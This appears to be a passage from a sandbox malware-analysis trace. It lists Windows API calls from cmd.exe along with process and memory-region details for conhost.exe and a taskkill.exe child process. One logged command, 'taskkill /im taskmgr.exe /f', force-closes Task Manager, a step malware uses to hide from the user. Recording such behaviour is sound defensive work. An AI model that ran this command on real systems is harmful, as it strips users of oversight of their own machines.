[0248.185] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0248.185] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0248.185] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0248.185] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0248.185] GetProcessHeap () returned 0x7a0000 [0248.185] RtlFreeHeap (HeapHandle=0x7a0000, Flags=0x0, BaseAddress=0x7a7740) returned 1 [0248.185] GetProcessHeap () returned 0x7a0000 [0248.185] RtlAllocateHeap (HeapHandle=0x7a0000, Flags=0x8, Size=0xa) returned 0x7ab0d0 [0248.185] lstrcmpW (lpString1="\\taskkill.exe", lpString2="\\XCOPY.EXE") returned -1 [0248.188] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\taskkill.exe", lpCommandLine="taskkill /im taskmgr.exe /f", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpStartupInfo=0x19f6b0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="taskkill /im taskmgr.exe /f", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x19f6fc | out: lpCommandLine="taskkill /im taskmgr.exe /f", lpProcessInformation=0x19f6fc*(hProcess=0xa8, hThread=0xa4, dwProcessId=0xff8, dwThreadId=0x974)) returned 1 [0248.493] CloseHandle (hObject=0xa4) returned 1 [0248.493] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0248.494] GetProcessHeap () returned 0x7a0000 [0248.494] RtlFreeHeap (HeapHandle=0x7a0000, Flags=0x0, BaseAddress=0x7a9d88) returned 1 [0248.494] GetEnvironmentStringsW () returned 0x7a9d88* [0248.494] GetProcessHeap () returned 0x7a0000 [0248.494] RtlAllocateHeap (HeapHandle=0x7a0000, Flags=0x8, Size=0xa76) returned 0x7a7cf8 [0248.494] FreeEnvironmentStringsA (penv="=") returned 1 [0248.494] WaitForSingleObject (hHandle=0xa8, dwMilliseconds=0xffffffff) returned 0x0 [0256.341] GetExitCodeProcess (in: hProcess=0xa8, lpExitCode=0x19f694 | out: lpExitCode=0x19f694*=0x80) returned 1 [0256.342] CloseHandle (hObject=0xa8) returned 1 [0256.342] _vsnwprintf (in: _Buffer=0x19f77c, _BufferCount=0x13, _Format="%08X", _ArgList=0x19f69c | out: _Buffer="00000080") returned 8 [0256.342] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000080") returned 1 [0256.342] GetProcessHeap () returned 0x7a0000 [0256.343] RtlFreeHeap (HeapHandle=0x7a0000, Flags=0x0, BaseAddress=0x7a7cf8) returned 1 [0256.343] GetEnvironmentStringsW () returned 0x7a7cf8* [0256.343] GetProcessHeap () returned 0x7a0000 [0256.343] RtlAllocateHeap (HeapHandle=0x7a0000, Flags=0x8, Size=0xa9c) returned 0x7ac730 [0256.343] FreeEnvironmentStringsA (penv="=") returned 1 [0256.343] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0256.343] GetProcessHeap () returned 0x7a0000 [0256.343] RtlFreeHeap (HeapHandle=0x7a0000, Flags=0x0, BaseAddress=0x7ac730) returned 1 [0256.344] GetEnvironmentStringsW () returned 0x7a7cf8* [0256.344] GetProcessHeap () returned 0x7a0000 [0256.344] RtlAllocateHeap (HeapHandle=0x7a0000, Flags=0x8, Size=0xa9c) returned 0x7ac730 [0256.344] FreeEnvironmentStringsA (penv="=") returned 1 [0256.344] GetProcessHeap () returned 0x7a0000 [0256.344] RtlFreeHeap (HeapHandle=0x7a0000, Flags=0x0, BaseAddress=0x7ab0d0) returned 1 [0256.344] DeleteProcThreadAttributeList (in: lpAttributeList=0x19f728 | out: lpAttributeList=0x19f728) [0256.344] _get_osfhandle (_FileHandle=1) returned 0x3c [0256.344] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x7) returned 1 [0256.345] _get_osfhandle (_FileHandle=1) returned 0x3c [0256.345] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xd2f40c | out: lpMode=0xd2f40c) returned 1 [0256.345] _get_osfhandle (_FileHandle=0) returned 0x38 [0256.345] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0xd2f408 | out: lpMode=0xd2f408) returned 1 [0256.345] SetConsoleInputExeNameW () returned 0x1 [0256.345] GetConsoleOutputCP () returned 0x1b5 [0256.346] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xd2f460 | out: lpCPInfo=0xd2f460) returned 1 [0256.346] SetThreadUILanguage (LangId=0x0) returned 0x409 [0256.346] exit (_Code=128) Thread: id = 44 os_tid = 0x1050 Process: id = "12" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x387bb000" os_pid = "0x13b4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "11" os_parent_pid = "0xf94" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f4cd" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1016 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1017 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1018 start_va = 0x50000 end_va = 0x8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 1019 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 1020 start_va = 0x400000 end_va = 0x5fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 1021 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1022 start_va = 0x7df5fffc0000 end_va = 0x7df5fffe2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fffc0000" filename = "" Region: id = 1023 start_va = 0x7df5ffff0000 end_va = 0x7ff5fffeffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffff0000" filename = "" Region: id = 1024 start_va = 0x7ff7625c0000 end_va = 0x7ff7625d0fff monitored = 0 entry_point = 0x7ff7625c16b0 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 1025 start_va = 0x7ffd504d0000 end_va = 0x7ffd50690fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1026 start_va = 0x740000 end_va = 0x83ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000740000" filename = "" Region: id = 1027 start_va = 0x7ffd4d670000 end_va = 0x7ffd4d857fff monitored = 0 entry_point = 0x7ffd4d69ba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1028 start_va = 0x7ffd4e1c0000 end_va = 0x7ffd4e26cfff monitored = 0 entry_point = 0x7ffd4e1d81a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1029 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1030 start_va = 0x7df5ffec0000 end_va = 0x7df5fffbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffec0000" filename = "" Region: id = 1031 start_va = 0x90000 end_va = 0x14dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1032 start_va = 0x7ffd4df00000 end_va = 0x7ffd4df9cfff monitored = 0 entry_point = 0x7ffd4df078a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1033 start_va = 0x150000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 1034 start_va = 0x190000 end_va = 0x1cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 1035 start_va = 0x20000 end_va = 0x26fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1036 start_va = 0x7ffd45030000 end_va = 0x7ffd45088fff monitored = 0 entry_point = 0x7ffd4503fbf0 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 1037 start_va = 0x190000 end_va = 0x190fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 1038 start_va = 0x1c0000 end_va = 0x1cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 1039 start_va = 0x7ffd4dc70000 end_va = 0x7ffd4deecfff monitored = 0 entry_point = 0x7ffd4dd44970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 1040 start_va = 0x7ffd4da60000 end_va = 0x7ffd4db7bfff monitored = 0 entry_point = 0x7ffd4daa02b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1041 start_va = 0x7ffd4d860000 end_va = 0x7ffd4d8c9fff monitored = 0 entry_point = 0x7ffd4d896d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 1042 start_va = 0x7ffd4e9d0000 end_va = 0x7ffd4eb25fff monitored = 0 entry_point = 0x7ffd4e9da8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1043 start_va = 0x7ffd4d8d0000 end_va = 0x7ffd4da55fff monitored = 0 entry_point = 0x7ffd4d91ffc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1044 start_va = 0x1a0000 end_va = 0x1a6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 1045 start_va = 0x7ffd50380000 end_va = 0x7ffd504c2fff monitored = 0 entry_point = 0x7ffd503a8210 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 1046 start_va = 0x7ffd4e160000 end_va = 0x7ffd4e1bafff monitored = 0 entry_point = 0x7ffd4e1738b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1047 start_va = 0x7ffd4e2e0000 end_va = 0x7ffd4e31afff monitored = 0 entry_point = 0x7ffd4e2e12f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1048 start_va = 0x7ffd4db80000 end_va = 0x7ffd4dc40fff monitored = 0 entry_point = 0x7ffd4dba0da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 1049 start_va = 0x7ffd4b010000 end_va = 0x7ffd4b195fff monitored = 0 entry_point = 0x7ffd4b05d700 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 1050 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 1051 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 1052 start_va = 0x840000 end_va = 0x9c7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000840000" filename = "" Region: id = 1053 start_va = 0x9d0000 end_va = 0xb50fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009d0000" filename = "" Region: id = 1054 start_va = 0xb60000 end_va = 0x1f5ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b60000" filename = "" Region: id = 1055 start_va = 0x1f60000 end_va = 0x20cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f60000" filename = "" Region: id = 1056 start_va = 0x600000 end_va = 0x63ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000600000" filename = "" Region: id = 1057 start_va = 0x7ffd4eb30000 end_va = 0x7ffd5008efff monitored = 0 entry_point = 0x7ffd4ec911f0 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 1058 start_va = 0x7ffd4cb80000 end_va = 0x7ffd4cbc2fff monitored = 0 entry_point = 0x7ffd4cb94b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 1059 start_va = 0x7ffd4cce0000 end_va = 0x7ffd4d323fff monitored = 0 entry_point = 0x7ffd4cea64b0 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 1060 start_va = 0x7ffd4e480000 end_va = 0x7ffd4e526fff monitored = 0 entry_point = 0x7ffd4e4958d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1061 start_va = 0x7ffd500f0000 end_va = 0x7ffd50141fff monitored = 0 entry_point = 0x7ffd500ff530 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 1062 start_va = 0x7ffd4cb70000 end_va = 0x7ffd4cb7efff monitored = 0 entry_point = 0x7ffd4cb73210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 1063 start_va = 0x7ffd4d5b0000 end_va = 0x7ffd4d664fff monitored = 0 entry_point = 0x7ffd4d5f22e0 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 1064 start_va = 0x7ffd4cb10000 end_va = 0x7ffd4cb5afff monitored = 0 entry_point = 0x7ffd4cb135f0 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 1065 start_va = 0x7ffd4caf0000 end_va = 0x7ffd4cb03fff monitored = 0 entry_point = 0x7ffd4caf52e0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 1066 start_va = 0x7ffd4b470000 end_va = 0x7ffd4b505fff monitored = 0 entry_point = 0x7ffd4b495570 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 1067 start_va = 0x20d0000 end_va = 0x227ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000020d0000" filename = "" Region: id = 1068 start_va = 0x2280000 end_va = 0x25b6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1069 start_va = 0x50000 end_va = 0x51fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 1070 start_va = 0x60000 end_va = 0x60fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 1071 start_va = 0x640000 end_va = 0x699fff monitored = 1 entry_point = 0x6553f0 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 1072 start_va = 0x6a0000 end_va = 0x6c0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "cmd.exe.mui" filename = "\\Windows\\System32\\en-US\\cmd.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\cmd.exe.mui") Region: id = 1073 start_va = 0x25c0000 end_va = 0x27d6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025c0000" filename = "" Region: id = 1074 start_va = 0x27e0000 end_va = 0x29f1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000027e0000" filename = "" Region: id = 1075 start_va = 0x1f60000 end_va = 0x2071fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f60000" filename = "" Region: id = 1076 start_va = 0x20c0000 end_va = 0x20cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000020c0000" filename = "" Region: id = 1077 start_va = 0x2a00000 end_va = 0x2c1efff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002a00000" filename = "" Region: id = 1078 start_va = 0x20d0000 end_va = 0x21e7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000020d0000" filename = "" Region: id = 1079 start_va = 0x2270000 end_va = 0x227ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 1080 start_va = 0x640000 end_va = 0x67ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 1081 start_va = 0x7ffd4e320000 end_va = 0x7ffd4e479fff monitored = 0 entry_point = 0x7ffd4e3638e0 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 1082 start_va = 0x70000 end_va = 0x70fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 1083 start_va = 0x680000 end_va = 0x73bfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000680000" filename = "" Region: id = 1084 start_va = 0x70000 end_va = 0x73fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 1085 start_va = 0x7ffd4a370000 end_va = 0x7ffd4a391fff monitored = 0 entry_point = 0x7ffd4a371a40 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 1086 start_va = 0x7ffd4b200000 end_va = 0x7ffd4b212fff monitored = 0 entry_point = 0x7ffd4b202760 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 1087 start_va = 0x7ffd4c900000 end_va = 0x7ffd4c955fff monitored = 0 entry_point = 0x7ffd4c910bf0 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 1088 start_va = 0x80000 end_va = 0x86fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 1089 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 1090 start_va = 0x1f0000 end_va = 0x1f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 1091 start_va = 0x2080000 end_va = 0x2084fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "user32.dll.mui" filename = "\\Windows\\System32\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\user32.dll.mui") Region: id = 1092 start_va = 0x2090000 end_va = 0x2090fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "conhostv2.dll.mui" filename = "\\Windows\\System32\\en-US\\ConhostV2.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\conhostv2.dll.mui") Region: id = 1093 start_va = 0x20a0000 end_va = 0x20a1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000020a0000" filename = "" Region: id = 1094 start_va = 0x7ffd43ba0000 end_va = 0x7ffd43e13fff monitored = 0 entry_point = 0x7ffd43c10400 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll") Region: id = 1095 start_va = 0x20b0000 end_va = 0x20b0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 1096 start_va = 0x21f0000 end_va = 0x21f1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000021f0000" filename = "" Thread: id = 40 os_tid = 0x10a8 Thread: id = 41 os_tid = 0xc08 Thread: id = 42 os_tid = 0xca0 Thread: id = 43 os_tid = 0x1074 Process: id = "13" image_name = "taskkill.exe" filename = "c:\\windows\\syswow64\\taskkill.exe" page_root = "0x74e0f000" os_pid = "0xff8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "11" os_parent_pid = "0xf94" cmd_line = "taskkill /im taskmgr.exe /f" cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f4cd" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1105 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1106 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1107 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 1108 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 1109 start_va = 0xa0000 end_va = 0xdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 1110 start_va = 0xe0000 end_va = 0xe3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 1111 start_va = 0xf0000 end_va = 0xf0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000f0000" filename = "" Region: id = 1112 start_va = 0x100000 end_va = 0x101fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 1113 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 1114 start_va = 0xcf0000 end_va = 0xd05fff monitored = 0 entry_point = 0xcfde80 region_type = mapped_file name = "taskkill.exe" filename = "\\Windows\\SysWOW64\\taskkill.exe" (normalized: "c:\\windows\\syswow64\\taskkill.exe") Region: id = 1115 start_va = 0xd10000 end_va = 0x4d0ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000d10000" filename = "" Region: id = 1116 start_va = 0x77b90000 end_va = 0x77d0afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 1117 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 1118 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1119 start_va = 0x7fff0000 end_va = 0x7dfd504cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 1120 start_va = 0x7dfd504d0000 end_va = 0x7ffd504cffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfd504d0000" filename = "" Region: id = 1121 start_va = 0x7ffd504d0000 end_va = 0x7ffd50690fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1122 start_va = 0x7ffd50691000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffd50691000" filename = "" Region: id = 1123 start_va = 0x5d0000 end_va = 0x5dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005d0000" filename = "" Region: id = 1124 start_va = 0x6edd0000 end_va = 0x6ee1ffff monitored = 0 entry_point = 0x6ede8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 1125 start_va = 0x6ee20000 end_va = 0x6ee99fff monitored = 0 entry_point = 0x6ee33290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 1126 start_va = 0x74f30000 end_va = 0x7500ffff monitored = 0 entry_point = 0x74f43980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1127 start_va = 0x6eea0000 end_va = 0x6eea7fff monitored = 0 entry_point = 0x6eea17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 1128 start_va = 0x400000 end_va = 0x52ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 1129 start_va = 0x74f30000 end_va = 0x7500ffff monitored = 0 entry_point = 0x74f43980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1130 start_va = 0x76ad0000 end_va = 0x76c4dfff monitored = 0 entry_point = 0x76b81b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 1131 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1132 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 1133 start_va = 0x110000 end_va = 0x1cdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1134 start_va = 